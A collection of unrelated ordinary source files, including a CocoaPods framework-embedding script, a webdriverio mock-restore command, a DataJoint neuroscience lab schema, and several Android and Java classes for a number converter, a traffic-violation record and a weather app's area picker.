for lib in $swift_runtime_libs; do
echo "rsync -auv \"${SWIFT_STDLIB_PATH}/${lib}\" \"${destination}\""
rsync -auv "${SWIFT_STDLIB_PATH}/${lib}" "${destination}"
code_sign_if_enabled "${destination}/${lib}"
done
fi
}
# Copies and strips a vendored dSYM
install_dsym() {
local source="$1"
if [ -r "$source" ]; then
# Copy the dSYM into a the targets temp dir.
echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${DERIVED_FILES_DIR}\""
rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${DERIVED_FILES_DIR}"
local basename
basename="$(basename -s .framework.dSYM "$source")"
binary="${DERIVED_FILES_DIR}/${basename}.framework.dSYM/Contents/Resources/DWARF/${basename}"
# Strip invalid architectures so "fat" simulator / device frameworks work on device
if [[ "$(file "$binary")" == *"Mach-O dSYM companion"* ]]; then
strip_invalid_archs "$binary"
fi
if [[ $STRIP_BINARY_RETVAL == 1 ]]; then
# Move the stripped file into its final destination.
echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${DERIVED_FILES_DIR}/${basename}.framework.dSYM\" \"${DWARF_DSYM_FOLDER_PATH}\""
rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${DERIVED_FILES_DIR}/${basename}.framework.dSYM" "${DWARF_DSYM_FOLDER_PATH}"
else
# The dSYM was not stripped at all, in this case touch a fake folder so the input/output paths from Xcode do not reexecute this script because the file is missing.
touch "${DWARF_DSYM_FOLDER_PATH}/${basename}.framework.dSYM"
fi
fi
}
# Signs a framework with the provided identity
code_sign_if_enabled() {
if [ -n "${EXPANDED_CODE_SIGN_IDENTITY}" -a "${CODE_SIGNING_REQUIRED:-}" != "NO" -a "${CODE_SIGNING_ALLOWED}" != "NO" ]; then
# Use the current code_sign_identitiy
echo "Code Signing $1 with Identity ${EXPANDED_CODE_SIGN_IDENTITY_NAME}"
local code_sign_cmd="/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS:-} --preserve-metadata=identifier,entitlements '$1'"
if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
code_sign_cmd="$code_sign_cmd &"
fi
echo "$code_sign_cmd"
eval "$code_sign_cmd"
fi
}
# Strip invalid architectures
strip_invalid_archs() {
binary="$1"
# Get architectures for current target binary
binary_archs="$(lipo -info "$binary" | rev | cut -d ':' -f1 | awk '{$1=$1;print}' | rev)"
# Intersect them with the architectures we are building for
intersected_archs="$(echo ${ARCHS[@]} ${binary_archs[@]} | tr ' ' '\n' | sort | uniq -d)"
# If there are no archs supported by this binary then warn the user
if [[ -z "$intersected_archs" ]]; then
echo "warning: [CP] Vendored binary '$binary' contains architectures ($binary_archs) none of which match the current build architectures ($ARCHS)."
STRIP_BINARY_RETVAL=0
return
fi
stripped=""
for arch in $binary_archs; do
if ! [[ "${ARCHS}" == *"$arch"* ]]; then
# Strip non-valid architectures in-place
lipo -remove "$arch" -output "$binary" "$binary" || exit 1
stripped="$stripped $arch"
fi
done
if [[ "$stripped" ]]; then
echo "Stripped $binary of architectures:$stripped"
fi
STRIP_BINARY_RETVAL=1
}
# Embed the Pod frameworks for the active build configuration. The Debug and
# Release lists are generated by CocoaPods and currently install the same set.
if [[ "$CONFIGURATION" == "Debug" ]]; then
  install_framework "${BUILT_PRODUCTS_DIR}/BoringSSL/openssl.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/GoogleToolboxForMac/GoogleToolboxForMac.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/MDFInternationalization/MDFInternationalization.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/MDFTextAccessibility/MDFTextAccessibility.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/MaterialComponents/MaterialComponents.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/MotionAnimator/MotionAnimator.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/MotionInterchange/MotionInterchange.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/MotionTransitioning/MotionTransitioning.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/Protobuf/Protobuf.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/gRPC/GRPCClient.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/gRPC-Core/grpc.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/gRPC-ProtoRPC/ProtoRPC.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/gRPC-RxLibrary/RxLibrary.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/leveldb-library/leveldb.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/nanopb/nanopb.framework"
fi
if [[ "$CONFIGURATION" == "Release" ]]; then
  install_framework "${BUILT_PRODUCTS_DIR}/BoringSSL/openssl.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/GoogleToolboxForMac/GoogleToolboxForMac.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/MDFInternationalization/MDFInternationalization.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/MDFTextAccessibility/MDFTextAccessibility.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/MaterialComponents/MaterialComponents.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/MotionAnimator/MotionAnimator.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/MotionInterchange/MotionInterchange.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/MotionTransitioning/MotionTransitioning.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/Protobuf/Protobuf.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/gRPC/GRPCClient.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/gRPC-Core/grpc.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/gRPC-ProtoRPC/ProtoRPC.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/gRPC-RxLibrary/RxLibrary.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/leveldb-library/leveldb.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/nanopb/nanopb.framework"
fi
# When parallel signing backgrounded any codesign jobs, wait for them all
# before letting the script phase end.
if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
  wait
fi
|
<filename>packages/webdriverio/src/commands/browser/mockRestoreAll.ts
import logger from '@wdio/logger'
import { SESSION_MOCKS } from './mock'
const log = logger('webdriverio:mockRestoreAll')
/**
* Restores all mock information and behavior stored in all registered
* mocks of the session.
*
* <example>
:mockRestoreAll.js
it('should restore all mocks', async () => {
const googleMock = await browser.mock('https://google.com/')
googleMock.respond('https://webdriver.io')
const wdioMock = await browser.mock('https://webdriver.io')
wdioMock.respond('http://json.org')
await browser.url('https://google.com/')
console.log(await browser.getTitle()) // JSON
await browser.mockRestoreAll()
await browser.url('https://google.com/')
console.log(await browser.getTitle()) // Google
})
* </example>
*
* @alias browser.mockRestoreAll
*/
export default async function mockRestoreAll () {
for (const [handle, mocks] of Object.entries(SESSION_MOCKS)) {
log.trace(`Clearing mocks for ${handle}`)
for (const mock of mocks) {
mock.restore()
}
}
}
|
#!/bin/bash
# Run a single dieharder randomness test with a fixed seed so the result is
# reproducible.
#   -d 204        select one test by number — TODO confirm which test 204 maps
#                 to in this dieharder build (`dieharder -l` lists them)
#   -g 6          select input generator #6 — presumably a built-in RNG;
#                 verify with `dieharder -g -1` (lists generators)
#   -S 3969263179 fixed RNG seed
dieharder -d 204 -g 6 -S 3969263179
|
<reponame>guzman-raphael/Li-Daie-2015-2016<filename>pipeline/lab.py
import datajoint as dj
from . import get_schema_name
# Bind this module's tables to the "lab" schema; the concrete database name is
# resolved per deployment by get_schema_name.
schema = dj.schema(get_schema_name('lab'))
@schema
class Person(dj.Manual):
    """Lab member; referenced e.g. as the person responsible for a subject."""

    definition = """
    username : varchar(24)
    ----
    fullname : varchar(255)
    """
@schema
class Rig(dj.Manual):
    """Experimental rig and the room it is located in."""

    definition = """
    rig : varchar(24)
    ---
    room : varchar(20) # example 2w.342
    rig_description : varchar(1024)
    """
@schema
class Species(dj.Lookup):
    """Animal species lookup (zip yields the 1-tuples a single-column table needs)."""

    definition = """
    species: varchar(24)
    """
    contents = zip(['Mus musculus'])
@schema
class AnimalStrain(dj.Lookup):
    """Animal strain lookup (short strain codes)."""

    definition = """
    animal_strain : varchar(30)
    """
    contents = zip(['pl56', 'kj18'])
@schema
class AnimalSource(dj.Lookup):
    """Vendor/institution an animal was obtained from."""

    definition = """
    animal_source : varchar(30)
    """
    contents = zip(['Jackson Labs', 'Allen Institute', 'Charles River', 'MMRRC', 'Taconic', 'Other'])
@schema
class ModifiedGene(dj.Manual):
    """Gene modification and its optional free-text description."""

    definition = """
    gene_modification : varchar(60)
    ---
    gene_modification_description = '' : varchar(256)
    """
@schema
class Subject(dj.Manual):
    """Experimental animal with optional owner, source, strain(s) and gene mod(s)."""

    definition = """
    subject_id : int # institution 6 digit animal ID
    ---
    -> [nullable] Person # person responsible for the animal
    cage_number=null : int # institution 6 digit animal ID
    date_of_birth=null : date # format: yyyy-mm-dd
    sex : enum('M','F','Unknown')
    -> Species
    -> [nullable] AnimalSource # where was the animal ordered from
    """
    # NOTE(review): cage_number's in-definition comment ("institution 6 digit
    # animal ID") looks copy-pasted from subject_id — confirm and fix upstream.

    class Strain(dj.Part):
        """Strain(s) assigned to this subject."""

        definition = """
        # Subject gene modifications
        -> master
        -> AnimalStrain
        """

    class GeneModification(dj.Part):
        """Gene modification(s) of this subject, with zygosity and type."""

        definition = """
        # Subject gene modifications
        -> master
        -> ModifiedGene
        ---
        zygosity = 'Unknown' : enum('Het', 'Hom', 'Unknown')
        type = 'Unknown' : enum('Knock-in', 'Transgene', 'Unknown')
        """
@schema
class CompleteGenotype(dj.Computed):
    """Full genotype string per subject; ``make`` is currently a no-op stub."""

    # should be computed
    definition = """
    -> Subject
    ---
    complete_genotype : varchar(1000)
    """

    def make(self, key):
        # Stub — populate logic not implemented yet, so nothing is inserted.
        pass
@schema
class WaterRestriction(dj.Manual):
    """Water-restriction record per subject (WR number, cage, start date/weight)."""

    definition = """
    -> Subject
    ---
    water_restriction_number : varchar(16) # WR number
    cage_number : int
    wr_start_date : date
    wr_start_weight : Decimal(6,3)
    """
@schema
class VirusSource(dj.Lookup):
    """Source a virus preparation was obtained from."""

    definition = """
    virus_source : varchar(60)
    """
    contents = zip(['Janelia core', 'UPenn', 'Addgene', 'UNC', 'Other'])
@schema
class SkullReference(dj.Lookup):
    """Stereotaxic skull landmark used as a coordinate reference."""

    definition = """
    skull_reference : varchar(60)
    """
    contents = zip(['Bregma', 'Lambda'])
@schema
class BrainArea(dj.Lookup):
    """Brain area abbreviations with human-readable descriptions."""

    definition = """
    brain_area: varchar(32)
    ---
    description = null : varchar (4000) # name of the brain area
    """
    contents = [('ALM', 'anterior lateral motor cortex'),
                ('M2', 'secondary motor cortex'),
                ('PONS', 'pontine nucleus'),
                ('vS1', 'vibrissal primary somatosensory cortex ("barrel cortex")'),
                ('Thalamus', 'Thalamus'),
                ('Medulla', 'Medulla'),
                ('Striatum', 'Striatum')]
@schema
class Hemisphere(dj.Lookup):
    """Brain hemisphere selector."""

    definition = """
    hemisphere: varchar(32)
    """
    contents = zip(['left', 'right', 'both'])
@schema
class ProbeType(dj.Lookup):
    """Category of recording probe."""

    definition = """
    probe_type: varchar(32)
    """
    contents = zip(['nn_silicon_probe', 'tetrode_array', 'neuropixel'])
@schema
class Probe(dj.Lookup):
    """A physical probe model plus its per-electrode geometry."""

    definition = """ # represent a physical probe
    probe: varchar(32) # unique identifier for this model of probe (e.g. part number)
    ---
    -> ProbeType
    probe_comment='' : varchar(1000)
    """

    class Electrode(dj.Part):
        """Electrode coordinates (um) within the probe; positions may be null."""

        definition = """
        -> master
        electrode: int # electrode
        ---
        x_coord=NULL: float # (um) x coordinate of the electrode within the probe
        y_coord=NULL: float # (um) y coordinate of the electrode within the probe
        z_coord=NULL: float # (um) z coordinate of the electrode within the probe
        """
@schema
class ElectrodeConfig(dj.Lookup):
    """Named electrode configuration of a probe, deduplicated via a hash."""

    definition = """
    -> Probe
    electrode_config_name: varchar(16) # user friendly name
    ---
    electrode_config_hash: varchar(36) # hash of the group and group_member (ensure uniqueness)
    unique index (electrode_config_hash)
    """

    class ElectrodeGroup(dj.Part):
        """Group of electrodes clustered together within this configuration."""

        definition = """
        # grouping of electrodes to be clustered together (e.g. a neuropixel electrode config - 384/960)
        -> master
        electrode_group: int # electrode group
        """

    class Electrode(dj.Part):
        """Membership of a probe electrode in an electrode group."""

        definition = """
        -> master.ElectrodeGroup
        -> Probe.Electrode
        """
@schema
class PhotostimDevice(dj.Lookup):
    """Photostimulation light source with its excitation wavelength (nm)."""

    definition = """
    photostim_device : varchar(20)
    ---
    excitation_wavelength : decimal(5,1) # (nm)
    photostim_device_description : varchar(255)
    """
    # NOTE(review): the LaserCoboltMambo100 row (594 nm) reuses the Gem 473
    # description, and the OBIS470 row lists wavelength 473 despite "470" in
    # the name — confirm these entries against the hardware inventory.
    contents = [('LaserGem473', 473, 'Laser (Laser Quantum, Gem 473)'),
                ('LaserCoboltMambo100', 594, 'Laser (Laser Quantum, Gem 473)'),
                ('LED470', 470, 'LED (Thor Labs, M470F3 - 470 nm, 17.2 mW (Min) Fiber-Coupled LED)'),
                ('OBIS470', 473, 'OBIS 473nm LX 50mW Laser System: Fiber Pigtail (Coherent Inc)')]
|
package com.NumCo.numberconverter.Cipher.CipherFragments;
import android.content.Context;
import android.content.SharedPreferences;
import android.os.Bundle;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.ListView;
import androidx.fragment.app.Fragment;
import androidx.fragment.app.FragmentActivity;
import com.NumCo.numberconverter.Cipher.CipherAdapters.HelpListAdapter;
import com.NumCo.numberconverter.Cipher.Commands;
import com.NumCo.numberconverter.Cipher.Store;
import com.NumCo.numberconverter.ObjectPainter.Status;
import com.NumCo.numberconverter.R;
import java.util.ArrayList;
public class HelpFragment extends Fragment {
private ListView listView;
@Override
public View onCreateView(LayoutInflater inflater, ViewGroup container,
Bundle savedInstanceState) {
View view = inflater.inflate(R.layout.fragment_cipher_help, container, false);
listView = view.findViewById(R.id.cipherHelpFirstListView);
listView.setAdapter(getAdapter(requireActivity()));
return view;
}
private HelpListAdapter getAdapter(FragmentActivity activity) {
SharedPreferences sharedPreferences = activity.getSharedPreferences("saved-options", Context.MODE_PRIVATE);
String selectedOutput = sharedPreferences.getString("output", "HEX");
String selectedInput = sharedPreferences.getString("input", "DEC");
ArrayList<Store.ImageGenerator> imageData = new ArrayList<>();
if (!selectedInput.equals(selectedOutput)) {
imageData.add(new Store.ImageGenerator(selectedInput,
Commands.getHelpImageCommands(selectedInput, Status.INPUT.color), Status.INPUT));
imageData.add(new Store.ImageGenerator(selectedOutput,
Commands.getHelpImageCommands(selectedOutput, Status.OUTPUT.color), Status.OUTPUT));
} else {
imageData.add(new Store.ImageGenerator(selectedInput,
Commands.getHelpImageCommands(selectedInput, Status.ERROR.color), Status.ERROR));
}
for (String id : Commands.helpImageIds) {
if (!id.equals(selectedOutput) && !id.equals(selectedInput)) {
Status status = id.equals("CIPHER") ? Status.NORMAL : Status.DISABLED;
imageData.add(new Store.ImageGenerator(id,
Commands.getHelpImageCommands(id, status.color), status));
}
}
return new HelpListAdapter(activity, imageData);
}
} |
<gh_stars>0
package com.zhcs.entity;
import java.io.Serializable;
import java.math.BigDecimal;
import java.util.Date;
//*****************************************************************************
/**
 * <p>Title: IllegaEntity</p>
 * <p>Description: traffic-violation management entity — one recorded
 * violation with the vehicle, violator, penalty and audit fields</p>
 * <p>Copyright: Copyright (c) 2017</p>
 * <p>Company: Shenzhen Smart City Manager Information Technology Co., Ltd.
 * (深圳市智慧城市管家信息科技有限公司)</p>
 * @author 刘晓东 - Alter
 * @version v1.0 2017-02-23
 */
//*****************************************************************************
public class IllegaEntity implements Serializable {
    private static final long serialVersionUID = 1L;
    // primary key id
    private Long id;
    // license plate (foreign key into the vehicle table)
    private Long cno;
    // license plate (the actual plate text)
    private String cnoText;
    // violation date
    private Date illtm;
    // violation reason (id; causeName carries the display text)
    private Long cause;
    // violation reason (display name)
    private String causeName;
    // violator (person id)
    private Long person;
    // violator name
    private String personName;
    // fine amount
    private BigDecimal amount;
    // demerit points deducted
    private int score;
    // violation location
    private String addr;
    // penalizing authority
    private String unit;
    // status
    private String status;
    // created by (person id)
    private Long crtid;
    // creation time
    private Date crttm;
    // last modified by (person id)
    private Long updid;
    // last modified time
    private Date updtm;

    /**
     * Sets the primary key id.
     */
    public void setId(Long id) {
        this.id = id;
    }

    /**
     * Gets the primary key id.
     */
    public Long getId() {
        return id;
    }

    /**
     * Sets the license plate (foreign key into the vehicle table).
     */
    public void setCno(Long cno) {
        this.cno = cno;
    }

    /**
     * Gets the license plate (foreign key into the vehicle table).
     */
    public Long getCno() {
        return cno;
    }

    /**
     * Sets the violation date.
     */
    public void setIlltm(Date illtm) {
        this.illtm = illtm;
    }

    /**
     * Gets the violation date.
     */
    public Date getIlltm() {
        return illtm;
    }

    /**
     * Sets the violation reason (id).
     */
    public void setCause(Long cause) {
        this.cause = cause;
    }

    /**
     * Gets the violation reason (id).
     */
    public Long getCause() {
        return cause;
    }

    /**
     * Sets the violator (person id).
     */
    public void setPerson(Long person) {
        this.person = person;
    }

    /**
     * Gets the violator (person id).
     */
    public Long getPerson() {
        return person;
    }

    /**
     * Sets the fine amount.
     */
    public void setAmount(BigDecimal amount) {
        this.amount = amount;
    }

    /**
     * Gets the fine amount.
     */
    public BigDecimal getAmount() {
        return amount;
    }

    /**
     * Sets the violation location.
     */
    public void setAddr(String addr) {
        this.addr = addr;
    }

    /**
     * Gets the violation location.
     */
    public String getAddr() {
        return addr;
    }

    /**
     * Sets the penalizing authority.
     */
    public void setUnit(String unit) {
        this.unit = unit;
    }

    /**
     * Gets the penalizing authority.
     */
    public String getUnit() {
        return unit;
    }

    /**
     * Sets the status.
     */
    public void setStatus(String status) {
        this.status = status;
    }

    /**
     * Gets the status.
     */
    public String getStatus() {
        return status;
    }

    /**
     * Sets the creator's person id.
     */
    public void setCrtid(Long crtid) {
        this.crtid = crtid;
    }

    /**
     * Gets the creator's person id.
     */
    public Long getCrtid() {
        return crtid;
    }

    /**
     * Sets the creation time.
     */
    public void setCrttm(Date crttm) {
        this.crttm = crttm;
    }

    /**
     * Gets the creation time.
     */
    public Date getCrttm() {
        return crttm;
    }

    /**
     * Sets the last modifier's person id.
     */
    public void setUpdid(Long updid) {
        this.updid = updid;
    }

    /**
     * Gets the last modifier's person id.
     */
    public Long getUpdid() {
        return updid;
    }

    /**
     * Sets the last modification time.
     */
    public void setUpdtm(Date updtm) {
        this.updtm = updtm;
    }

    /**
     * Gets the last modification time.
     */
    public Date getUpdtm() {
        return updtm;
    }

    /**
     * Gets the license plate text (the actual plate).
     */
    public String getCnoText() {
        return cnoText;
    }

    /**
     * Sets the license plate text (the actual plate).
     */
    public void setCnoText(String cnoText) {
        this.cnoText = cnoText;
    }

    /**
     * Gets the violator's name.
     */
    public String getPersonName() {
        return personName;
    }

    /**
     * Sets the violator's name.
     */
    public void setPersonName(String personName) {
        this.personName = personName;
    }

    /**
     * Gets the violation reason display name.
     */
    public String getCauseName() {
        return causeName;
    }

    /**
     * Sets the violation reason display name.
     */
    public void setCauseName(String causeName) {
        this.causeName = causeName;
    }

    /**
     * Gets the demerit points deducted.
     */
    public int getScore() {
        return score;
    }

    /**
     * Sets the demerit points deducted.
     */
    public void setScore(int score) {
        this.score = score;
    }
}
|
package com.codexiaosheng.weatherp;
import android.app.ProgressDialog;
import android.content.Intent;
import android.os.Bundle;
import android.os.Handler;
import android.os.Message;
import android.support.annotation.Nullable;
import android.support.v4.app.Fragment;
import android.text.TextUtils;
import android.util.Log;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.AdapterView;
import android.widget.ArrayAdapter;
import android.widget.Button;
import android.widget.ListView;
import android.widget.TextView;
import com.codexiaosheng.weatherp.bean.ProvinceCityCountyBean;
import com.codexiaosheng.weatherp.constant.Constant;
import com.codexiaosheng.weatherp.db.CityBean;
import com.codexiaosheng.weatherp.db.CountyBean;
import com.codexiaosheng.weatherp.db.ProvinceBean;
import com.codexiaosheng.weatherp.util.Util;
import com.google.gson.Gson;
import com.google.gson.reflect.TypeToken;
import org.litepal.crud.DataSupport;
import java.util.ArrayList;
import java.util.List;
import static com.codexiaosheng.weatherp.constant.Constant.LEVEL_CITY;
import static com.codexiaosheng.weatherp.constant.Constant.LEVEL_COUNTY;
import static com.codexiaosheng.weatherp.constant.Constant.LEVEL_PROVINCE;
/**
 * Description: displays provinces, cities and counties for the user to pick
 * a location from.
 * <p>
 * Created by code-xiaosheng on 2017/8/2.
 */
public class ChooseAreaFragment extends Fragment {
private Button btnBack;
private TextView tvTitle;
private ListView lvView;
private ArrayAdapter<String> adapter;
private List<String> datas = new ArrayList<>();
// 当前选中的级别
private int currentLevel;
private ProvinceBean selectProvince; // 选中的省份
private CityBean selectCity; // 选中的市
private ProgressDialog progressDialog;
// 省市县集合
private List<ProvinceCityCountyBean> pccList = new ArrayList<>();
private List<ProvinceBean> provinceList = new ArrayList<>();
private List<CityBean> cityList = new ArrayList<>();
private List<CountyBean> countyList = new ArrayList<>();
@Nullable
@Override
public View onCreateView(LayoutInflater inflater, @Nullable ViewGroup container,
                         @Nullable Bundle savedInstanceState) {
    // Inflate the chooser layout and wire up the list backed by `datas`.
    View root = inflater.inflate(R.layout.choose_area, container, false);
    btnBack = (Button) root.findViewById(R.id.btn_back);
    tvTitle = (TextView) root.findViewById(R.id.tv_title);
    lvView = (ListView) root.findViewById(R.id.lv_view);
    adapter = new ArrayAdapter<>(getContext(),
            android.R.layout.simple_expandable_list_item_1, datas);
    lvView.setAdapter(adapter);
    return root;
}
@Override
public void onActivityCreated(@Nullable Bundle savedInstanceState) {
    super.onActivityCreated(savedInstanceState);
    // Drill down one level per tap: province -> city -> county. Tapping a
    // county either launches WeatherActivity (when hosted by MainActivity)
    // or refreshes the weather in the already-open WeatherActivity.
    lvView.setOnItemClickListener(new AdapterView.OnItemClickListener() {
        @Override
        public void onItemClick(AdapterView<?> parent, View view, int position, long id) {
            if (currentLevel == LEVEL_PROVINCE) {
                selectProvince = provinceList.get(position);
                queryCities();
            } else if (currentLevel == LEVEL_CITY) {
                selectCity = cityList.get(position);
                queryCounties();
            } else if (currentLevel == LEVEL_COUNTY) {
                String cityName = countyList.get(position).getName();
                if (getActivity() instanceof MainActivity) {
                    Intent intent = new Intent(getActivity(), WeatherActivity.class);
                    intent.putExtra("city_name", cityName);
                    startActivity(intent);
                    getActivity().finish();
                } else if (getActivity() instanceof WeatherActivity) {
                    // Already inside the weather screen: close the drawer and
                    // refresh in place instead of relaunching the activity.
                    WeatherActivity activity = (WeatherActivity) getActivity();
                    activity.drawerLayout.closeDrawers();
                    activity.refreshLayout.setRefreshing(true);
                    activity.cityNames = cityName;
                    activity.requestWeatherData(cityName);
                }
            }
        }
    });
    // Back walks one level up; it is hidden at province level (queryDatas),
    // so only the city and county levels need handling.
    btnBack.setOnClickListener(new View.OnClickListener() {
        @Override
        public void onClick(View v) {
            if (currentLevel == LEVEL_CITY) {
                queryDatas();
            } else if (currentLevel == LEVEL_COUNTY) {
                queryCities();
            }
        }
    });
    // Start at the province level.
    queryDatas();
}
/**
 * Loads the county-level entries for the currently selected city from the
 * local database and shows them in the list.
 */
private void queryCounties() {
    tvTitle.setText(selectCity.getName());
    btnBack.setVisibility(View.VISIBLE);
    showProgressDialog();
    countyList = DataSupport.where("cid = ?",
            String.valueOf(selectCity.getCid())).find(CountyBean.class);
    // FIX: dismiss the dialog unconditionally — the original only closed it
    // inside the non-empty branch, leaving it spinning forever when the
    // query returned no rows.
    closeProgressDialog();
    if (countyList.size() > 0) {
        datas.clear();
        for (CountyBean county : countyList) {
            datas.add(county.getName());
        }
        adapter.notifyDataSetChanged();
        // Restored to match queryCities/queryDatas: scroll to the top when a
        // new level is displayed.
        lvView.setSelection(0);
        currentLevel = Constant.LEVEL_COUNTY;
    }
}
/**
 * Loads the city-level entries for the currently selected province from the
 * local database and shows them in the list.
 */
private void queryCities() {
    tvTitle.setText(selectProvince.getName());
    btnBack.setVisibility(View.VISIBLE);
    showProgressDialog();
    cityList = DataSupport.where("provinceid = ?",
            String.valueOf(selectProvince.getPid())).find(CityBean.class);
    // FIX: dismiss the dialog unconditionally — the original only closed it
    // when rows were found, leaving it spinning forever on an empty result.
    closeProgressDialog();
    if (cityList.size() > 0) {
        datas.clear();
        for (CityBean city : cityList) {
            datas.add(city.getName());
        }
        adapter.notifyDataSetChanged();
        lvView.setSelection(0);
        currentLevel = Constant.LEVEL_CITY;
    }
}
/**
 * Loads all province-level entries: queries the local database first and,
 * when it is empty, falls back to parsing the bundled JSON via
 * {@link #queryFromServer()}.
 */
private void queryDatas() {
    tvTitle.setText("中国");
    btnBack.setVisibility(View.GONE);
    showProgressDialog();
    provinceList = DataSupport.findAll(ProvinceBean.class);
    if (provinceList.size() > 0) {
        datas.clear();
        for (ProvinceBean province : provinceList) {
            datas.add(province.getName());
        }
        closeProgressDialog();
        adapter.notifyDataSetChanged();
        lvView.setSelection(0);
        currentLevel = Constant.LEVEL_PROVINCE;
    } else {
        // queryFromServer reports completion through `handler`, which also
        // closes the progress dialog. NOTE(review): if the asset JSON is
        // empty no message is ever sent and the dialog stays open — confirm.
        queryFromServer();
    }
}
// Receives completion signals from the background parsing thread in
// queryFromServer: 10 = provinces saved, 20 = cities saved, 30 = counties
// saved. Each message also dismisses the progress dialog.
// NOTE(review): Handler() without an explicit Looper is deprecated on newer
// Android SDKs, and this anonymous Handler holds an implicit reference to
// the fragment — confirm lifecycle handling before reusing this pattern.
private Handler handler = new Handler() {
    @Override
    public void handleMessage(Message msg) {
        super.handleMessage(msg);
        closeProgressDialog();
        int type = msg.what;
        switch (type) {
            case 10:
                Log.e("ChooseAreaFragment", "handleMessage: Province->" + provinceList.size());
                // Provinces are now in the DB; re-run the query to display them.
                queryDatas();
                break;
            case 20:
                Log.e("ChooseAreaFragment", "handleMessage: City->" + cityList.size());
                break;
            case 30:
                Log.e("ChooseAreaFragment", "handleMessage: County->" + countyList.size());
                break;
        }
    }
};
/**
 * Parses the province/city/county JSON bundled in the app's assets on a
 * background thread and persists each level to the local database (LitePal).
 * Progress is reported to {@code handler}: 10 after the last province, 20
 * after the last city, 30 after the last county.
 */
private void queryFromServer() {
    new Thread(new Runnable() {
        @Override
        public void run() {
            String json = Util.getDataFromAssets(getActivity());
            if (!TextUtils.isEmpty(json)) {
                Gson gson = new Gson();
                pccList = gson.fromJson(json, new TypeToken<List<ProvinceCityCountyBean>>() {
                }.getType());
                if (pccList.size() > 0) {
                    for (int i = 0; i < pccList.size(); i++) {
                        ProvinceCityCountyBean bean = pccList.get(i);
                        ProvinceBean province = new ProvinceBean();
                        province.setName(bean.getName());
                        province.setId(Integer.parseInt(bean.getId()));
                        province.setPid(Integer.parseInt(bean.getId()));
                        provinceList.add(province);
                        province.save();
                        // Signal once the final province has been persisted.
                        if (i == pccList.size() - 1) {
                            handler.sendEmptyMessage(10);
                        }
                        List<ProvinceCityCountyBean.CityListBeanX> cList = bean.getCityList();
                        for (int j = 0; j < cList.size(); j++) {
                            ProvinceCityCountyBean.CityListBeanX cBean = cList.get(j);
                            CityBean city = new CityBean();
                            city.setName(cBean.getName());
                            city.setId(Integer.parseInt(cBean.getId()));
                            city.setProvinceid(Integer.parseInt(bean.getId()));
                            city.setCid(Integer.parseInt(cBean.getId()));
                            city.save();
                            cityList.add(city);
                            // Signal once the very last city has been persisted.
                            if (i == pccList.size() - 1 && j == cList.size() - 1) {
                                handler.sendEmptyMessage(20);
                                Log.e("city id", "run: " + cBean.getId() + "--" + city.getId());
                            }
                            List<ProvinceCityCountyBean.CityListBeanX.CityListBean> countyL =
                                    cBean.getCityList();
                            for (int k = 0; k < countyL.size(); k++) {
                                ProvinceCityCountyBean.CityListBeanX.CityListBean countB =
                                        countyL.get(k);
                                CountyBean county = new CountyBean();
                                county.setId(Integer.parseInt(countB.getId()));
                                county.setCountyid(Integer.parseInt(countB.getId()));
                                county.setName(countB.getName());
                                county.setCid(Integer.parseInt(cBean.getId()));
                                county.save();
                                countyList.add(county);
                                // Signal once the very last county has been persisted.
                                if (i == pccList.size() - 1 && j == cList.size() - 1 && k == countyL.size() - 1) {
                                    handler.sendEmptyMessage(30);
                                }
                            }
                        }
                    }
                }
            }
        }
    }).start();
}
/**
 * 加载框 — show the (lazily created) modal progress dialog.
 */
private void showProgressDialog() {
    if (progressDialog != null) {
        progressDialog.show();
        return;
    }
    progressDialog = new ProgressDialog(getActivity());
    progressDialog.setMessage("正在加载中...");
    progressDialog.setCanceledOnTouchOutside(false);
    progressDialog.show();
}
/**
 * 关闭加载框 — dismiss the progress dialog, if one was ever created.
 */
private void closeProgressDialog() {
    if (progressDialog == null) {
        return;
    }
    progressDialog.dismiss();
}
}
|
